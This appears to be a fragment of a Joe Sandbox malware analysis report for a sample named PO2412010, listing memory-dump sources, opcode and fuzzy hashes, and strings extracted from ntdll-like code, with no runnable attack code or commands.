                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                        • Instruction ID: 4a7897515abb2f1f567e8876d869083942100e689fe1ebc4185aedf86f558bec
                                                                        • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                        • Instruction Fuzzy Hash: 56F0E539204B419BEB16EF19C150AA57BF4FB41350B054094F8468B311D731E985CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                        • Instruction ID: 031052ca7edb22dce18cc414e9767e6bf83c45e6ca758bf6276f0897dd7318e6
                                                                        • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                        • Instruction Fuzzy Hash: F5E0D8323441C5AFD7222A598840BA67FADDBD87A0F15042DE2028B353DB70DC40C7DC
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: be759bac495639e6bed71e36b8bc82723621cf1b58a3ca98e21869d64b127be6
                                                                        • Instruction ID: d732e062ff7cba995f7d52d475bcf3cabf2723f9e439ca4417e737737761b118
                                                                        • Opcode Fuzzy Hash: be759bac495639e6bed71e36b8bc82723621cf1b58a3ca98e21869d64b127be6
                                                                        • Instruction Fuzzy Hash: 2BF06531A255918FE7FAD72DD644B557BE4EF14630F1A05D4DC0587912E724DCC0CA50
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                        • Instruction ID: 0ef18cdbb177ab57597054ed37eb86a540261a3fc9eea4cdfc05bbb6ee45a958
                                                                        • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                        • Instruction Fuzzy Hash: 39E0DF72A00120BBDF229799DE01F9ABFACDB94FA0F0500A5FA05E70A0E630DE04C690
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 563c72b82123df5d6302f99e9dc852f51b7ef650b8b6d2ac78f7f874b8f66147
                                                                        • Instruction ID: f1504d0cb78ba68c51e35e46cd68927ddb71a12a69e1549c76bebe6ded356f2f
                                                                        • Opcode Fuzzy Hash: 563c72b82123df5d6302f99e9dc852f51b7ef650b8b6d2ac78f7f874b8f66147
                                                                        • Instruction Fuzzy Hash: 1A9002A5201950924500B2588404B0A451597E0201F56C016E1064561CC52989519236
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 371130060fedd8d49cc61b2a87b26bc3069f476bc4dfa658e7f47d4c13bbbb56
                                                                        • Instruction ID: de14f8a9b1f01f383f5d7455c0551f74e4c6aa646a125f3a9ab7d1ab8542d1c9
                                                                        • Opcode Fuzzy Hash: 371130060fedd8d49cc61b2a87b26bc3069f476bc4dfa658e7f47d4c13bbbb56
                                                                        • Instruction Fuzzy Hash: 1A900229221810020145B558060450B0455A7D6351796C015F1426591CC62589655322
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e891a243b6528b52a6e0f09add7bbcbd9647d223c25380d680d9eb8e5d8fdcd1
                                                                        • Instruction ID: 0a2724130dc1b8a30289705a5b96bc2fa63120fe988700033c8e967dfd9d6776
                                                                        • Opcode Fuzzy Hash: e891a243b6528b52a6e0f09add7bbcbd9647d223c25380d680d9eb8e5d8fdcd1
                                                                        • Instruction Fuzzy Hash: 9A90043D311C10030105F55C07045070057D7D5351757C031F1035551CD735CD715333
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 69937edfee9329de1002d2ebc040236051af8e120704aca85d0854830749f244
                                                                        • Instruction ID: 774d3a6d08bb42471e61052f9f77244abab66b72d1221862ef4785e7261b65d8
                                                                        • Opcode Fuzzy Hash: 69937edfee9329de1002d2ebc040236051af8e120704aca85d0854830749f244
                                                                        • Instruction Fuzzy Hash: F990023524181402D141715844046060019A7D0241F96C012E0434555EC6598B56AB62
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9f9bc7fcbeb024d7ed965423f418500ed52bf3f080b922ba5919b235623c32ba
                                                                        • Instruction ID: 75af0f1571d67375117f79fa234f1b3d73ad315398caf46d9f4f3333c74ebd8a
                                                                        • Opcode Fuzzy Hash: 9f9bc7fcbeb024d7ed965423f418500ed52bf3f080b922ba5919b235623c32ba
                                                                        • Instruction Fuzzy Hash: 9C900225242851525545B15844045074016A7E0241B96C012E1424951CC52A9956D722
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0c18bdd0f860d6e49ad6515bbc0386bf27f556961f6393154ef8794e8e276212
                                                                        • Instruction ID: 1877c3a94754bd5a1c97ef211ce26cc989326b4252b7df0390619668ad6c087c
                                                                        • Opcode Fuzzy Hash: 0c18bdd0f860d6e49ad6515bbc0386bf27f556961f6393154ef8794e8e276212
                                                                        • Instruction Fuzzy Hash: 4F90022530181003D140715854186064015E7E1301F56D011E0424555CD91989565323
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ebc90b9b45bbb1931434e630c2c68153175d57bec11de95826cd3c0ca4a4a81a
                                                                        • Instruction ID: 26e210c9efba2898609aadc0b5de7dff3cc8ce836300a8b30e8962de4719f03b
                                                                        • Opcode Fuzzy Hash: ebc90b9b45bbb1931434e630c2c68153175d57bec11de95826cd3c0ca4a4a81a
                                                                        • Instruction Fuzzy Hash: 3F90022520585442D10075585408A06001597D0205F56D011E1074596DC6398951A232
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a7eae0a35daa34d7a1c7300863da687a61da952bfe48f8971ddba3f172bb5c71
                                                                        • Instruction ID: d286cb2f02eea8bf7f0ea7815ba9f8ccb61f795b4fb63569676e8f927f2ca757
                                                                        • Opcode Fuzzy Hash: a7eae0a35daa34d7a1c7300863da687a61da952bfe48f8971ddba3f172bb5c71
                                                                        • Instruction Fuzzy Hash: 0890022D21381002D1807158540860A001597D1202F96D415E0025559CC91989695322
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5a13beafd8eea89afc2907fa1d4329b74b52e3785165082a458721c8e04d4148
                                                                        • Instruction ID: 9632db46a5c3a9aa8a1332b824f9b853e5f2c78202927fe46af98279f772a4ee
                                                                        • Opcode Fuzzy Hash: 5a13beafd8eea89afc2907fa1d4329b74b52e3785165082a458721c8e04d4148
                                                                        • Instruction Fuzzy Hash: A790023520181402D10075985408646001597E0301F56D011E5034556EC66989916232
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c4e542fd970a4d8d06eb0dd7d3d40daaf081da7355382c96bf75fbdf1b8c2b1a
                                                                        • Instruction ID: 7acea752dc440be401b56e13c542bfd0c7042471907a33ae8cc92547e15bb1f8
                                                                        • Opcode Fuzzy Hash: c4e542fd970a4d8d06eb0dd7d3d40daaf081da7355382c96bf75fbdf1b8c2b1a
                                                                        • Instruction Fuzzy Hash: AD90023520181403D10071585508707001597D0201F56D411E0434559DD65A89516222
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9b6dc3a5241c0df25af68e0257583f9bb250266ae7205f8e89f863e7fe4c0b37
                                                                        • Instruction ID: f59b2e43dc0dfd52a777beec24f3be4fd158ef5434241a05c9116673e881ed7b
                                                                        • Opcode Fuzzy Hash: 9b6dc3a5241c0df25af68e0257583f9bb250266ae7205f8e89f863e7fe4c0b37
                                                                        • Instruction Fuzzy Hash: 8690022560581402D14071585418706002597D0201F56D011E0034555DC65D8B5567A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fbfc4fec98500b7ea956e785a8aa8e7d736ba59ce10d18533dcb7dce697c32ab
                                                                        • Instruction ID: bec714ef7c1f2beae8abc10a3b8aa659f1ef569c3f297d0dcadcc6efe6f42004
                                                                        • Opcode Fuzzy Hash: fbfc4fec98500b7ea956e785a8aa8e7d736ba59ce10d18533dcb7dce697c32ab
                                                                        • Instruction Fuzzy Hash: 6E90023520181842D10071584404B46001597E0301F56C016E0134655DC619C9517622
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ef4e0a7675e448952774b1d9fc436ec571093760b64bf072898471573c16ab95
                                                                        • Instruction ID: 9d7f13940fc387ab53e4124fc44446235b9d7543d5dd1bc758d690db4af8ab3a
                                                                        • Opcode Fuzzy Hash: ef4e0a7675e448952774b1d9fc436ec571093760b64bf072898471573c16ab95
                                                                        • Instruction Fuzzy Hash: D8900235201C1402D10071584808747001597D0302F56C011E5174556EC669C9916632
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3d5fb6ec32a3294799ccf7c0af7526c7809768558c393c3ddd7a2872664832ab
                                                                        • Instruction ID: d6a954684e96c1efbc671fbff24d5c933122c0bec7d729d8a4416e90dbd2bdd6
                                                                        • Opcode Fuzzy Hash: 3d5fb6ec32a3294799ccf7c0af7526c7809768558c393c3ddd7a2872664832ab
                                                                        • Instruction Fuzzy Hash: 53900225601810424140716888449064015BBE1211B56C121E09A8551DC55D89655766
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0012859befca7efb9b9c4eebc2fd80cd7c8fbdd40f8eeec7e91ed328841d3d84
                                                                        • Instruction ID: 7bf3ca6ee3e538e01495ee55eb8e022387e033dd0ae3bf9e00996de5177fe1e9
                                                                        • Opcode Fuzzy Hash: 0012859befca7efb9b9c4eebc2fd80cd7c8fbdd40f8eeec7e91ed328841d3d84
                                                                        • Instruction Fuzzy Hash: EF900235201C1402D1007158481470B001597D0302F56C011E1174556DC62989516672
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3a539d2d334f3f1efaecf464e4247b070007b167d7cc87378f121e85ec1d3505
                                                                        • Instruction ID: 0bf3c940c2999fc22037223ad6b18463406963d4691ce19b0e575eeee609810d
                                                                        • Opcode Fuzzy Hash: 3a539d2d334f3f1efaecf464e4247b070007b167d7cc87378f121e85ec1d3505
                                                                        • Instruction Fuzzy Hash: 64900225211C1042D20075684C14B07001597D0303F56C115E0164555CC91989615622
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e89901bb40068d22dd530e120eee2a72446b62adb96066124877e8272a4d6361
                                                                        • Instruction ID: 909077ed1503c0cc025f6e8eb3c1ca04d3706f4355bcf4e1ce3dd31aad9b5806
                                                                        • Opcode Fuzzy Hash: e89901bb40068d22dd530e120eee2a72446b62adb96066124877e8272a4d6361
                                                                        • Instruction Fuzzy Hash: 1C90026534181442D10071584414B060015D7E1301F56C015E1074555DC61DCD526227
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dd420e161c592ed47524696f18b617d82c1a6603b40c4c546367804bc2a62cb5
                                                                        • Instruction ID: 789861148c6250f53b62870fd9930d090fcdaebedef01b538cf186e62f979de0
                                                                        • Opcode Fuzzy Hash: dd420e161c592ed47524696f18b617d82c1a6603b40c4c546367804bc2a62cb5
                                                                        • Instruction Fuzzy Hash: 5390026521181042D10471584404706005597E1201F56C012E2164555CC52D8D615226
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0e184933f96157c2d3c9d2692426f7ea74f5358778400ad2177a08db7ae05039
                                                                        • Instruction ID: fc662dce8cc954c90670728e0fec22efdb41a36e8a66bba6c42f06193d490ce5
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        • Opcode ID: d71441e66092c3583d97b15a18b35f0e5eae9b38a3754197bd7481fab01cf46a
                                                                        • Instruction ID: 187872ee3c30fb6e3d875e6b3cb0ae8351a7ec07213a448ca4247c75433bc7e4
                                                                        • Opcode Fuzzy Hash: d71441e66092c3583d97b15a18b35f0e5eae9b38a3754197bd7481fab01cf46a
                                                                        • Instruction Fuzzy Hash: 1851E7B6A00116BFDB11DBAC8D90ABEFBB8BB08640B14C16EF569D7641D334DE4087E0
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                        • API String ID: 48624451-2108815105
                                                                        • Opcode ID: ab617de52a096a0037f46dc1295153a8a30ee152c6938bf3a92383f682215b76
                                                                        • Instruction ID: 8958d8776de3357f460890645d99f54ece4b207878cdcb1af6202c195e653d7f
                                                                        • Opcode Fuzzy Hash: ab617de52a096a0037f46dc1295153a8a30ee152c6938bf3a92383f682215b76
                                                                        • Instruction Fuzzy Hash: 6F51F471A00646AEDF39DE6CCD9097EBBF8EF84200B4584D9E596C7681E774EB108760
                                                                        Strings
                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01AF46FC
                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01AF4655
                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01AF4725
                                                                        • Execute=1, xrefs: 01AF4713
                                                                        • ExecuteOptions, xrefs: 01AF46A0
                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01AF4742
                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01AF4787
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                        • API String ID: 0-484625025
                                                                        • Opcode ID: 9c7f5b0d24bf1a5a1f01b055115edc68be8f0889acec4c87de5520432cc5b875
                                                                        • Instruction ID: c8c907426938031c69dea85e3103f4b43bfe5e15b4cadf3a784202803f7bf880
                                                                        • Opcode Fuzzy Hash: 9c7f5b0d24bf1a5a1f01b055115edc68be8f0889acec4c87de5520432cc5b875
                                                                        • Instruction Fuzzy Hash: 3E510A316002597AEF25ABE9DCD5FFA7BBCEB58704F04009DE605A71C2EBB09A458B50
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldvrm
                                                                        • String ID: +$-$0$0
                                                                        • API String ID: 1302938615-699404926
                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                        • Instruction ID: 46c36e2d9191fbe8f01bf6e8da35e5895ff8769a583729f82cda1699fed62579
                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                        • Instruction Fuzzy Hash: A2819F70E062499EEF25CF6CC8527AEBBB1AF45BA0F1C415DD861A72D1C73698408B71
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: %%%u$[$]:%u
                                                                        • API String ID: 48624451-2819853543
                                                                        • Opcode ID: 8abbc0bc6af5df21f7af5e1d1991f7596ef1337668d9839c2059df25cc2bc522
                                                                        • Instruction ID: c41107f3e2670e67a43fb3e67211923b51889fc1741695682d9a9484ca7d0440
                                                                        • Opcode Fuzzy Hash: 8abbc0bc6af5df21f7af5e1d1991f7596ef1337668d9839c2059df25cc2bc522
                                                                        • Instruction Fuzzy Hash: 3021567AA00519ABDB15DE69CD41AEEBBF8EF94650F04019AE905D3200E73099118B91
                                                                        Strings
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01AF02BD
                                                                        • RTL: Re-Waiting, xrefs: 01AF031E
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01AF02E7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                        • API String ID: 0-2474120054
                                                                        • Opcode ID: 40a7461b59765d2442a3bbece38d03093c15d37e23374b954a12940c3707c532
                                                                        • Instruction ID: 4fc823c755d2ec9385c3fd6332e53d023e17920eb50b6b084323544dc1c6364a
                                                                        • Opcode Fuzzy Hash: 40a7461b59765d2442a3bbece38d03093c15d37e23374b954a12940c3707c532
                                                                        • Instruction Fuzzy Hash: 75E1BE306087419FE729CF68C984B2ABBE1FB88714F540A5DF6A5CB2E2D774D844CB52
                                                                        Strings
                                                                        • RTL: Resource at %p, xrefs: 01AF7B8E
                                                                        • RTL: Re-Waiting, xrefs: 01AF7BAC
                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01AF7B7F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                        • API String ID: 0-871070163
                                                                        • Opcode ID: ac45a01d19df78601a56ed8c0504a160f0efbd2eb5d1c0127a0b60646f798ba9
                                                                        • Instruction ID: a99958c07414f2379cba7b4ea1803a27b62454e398f41a1c5f33cf97aa57b2d5
                                                                        • Opcode Fuzzy Hash: ac45a01d19df78601a56ed8c0504a160f0efbd2eb5d1c0127a0b60646f798ba9
                                                                        • Instruction Fuzzy Hash: 9341F6313047469FDB25DF29C880BAAB7E9EF89710F000A1DFA56D7281DB31E805CBA1
                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AF728C
                                                                        Strings
                                                                        • RTL: Resource at %p, xrefs: 01AF72A3
                                                                        • RTL: Re-Waiting, xrefs: 01AF72C1
                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01AF7294
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_1a50000_PO2412010.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                        • API String ID: 885266447-605551621
                                                                        • Opcode ID: e29ca5bbfbd3e6b88ed4df51841f9f508410f26dd643cdb762a1c9a5dce9fa74
                                                                        • Instruction ID: e73cba7e14b53fb429455e1b1ec0c411c5a54628fa2d31bfd293338714a1cd75
                                                                        • Opcode Fuzzy Hash: e29ca5bbfbd3e6b88ed4df51841f9f508410f26dd643cdb762a1c9a5dce9fa74
                                                                        • Instruction Fuzzy Hash: D4411235700246ABD721DFA9CC81FAAB7A9FB54710F14061DFA55AB281DB30F80287E1
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1812197126.0000000001A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A50000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_2ed0000_duvyEsVvTpq.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: j$$=$($8^$=$L7$O5$Z$[$[$[5$]$d&$fX$k^$q$sw$y$}$4
                                                                        • API String ID: 0-2360868250
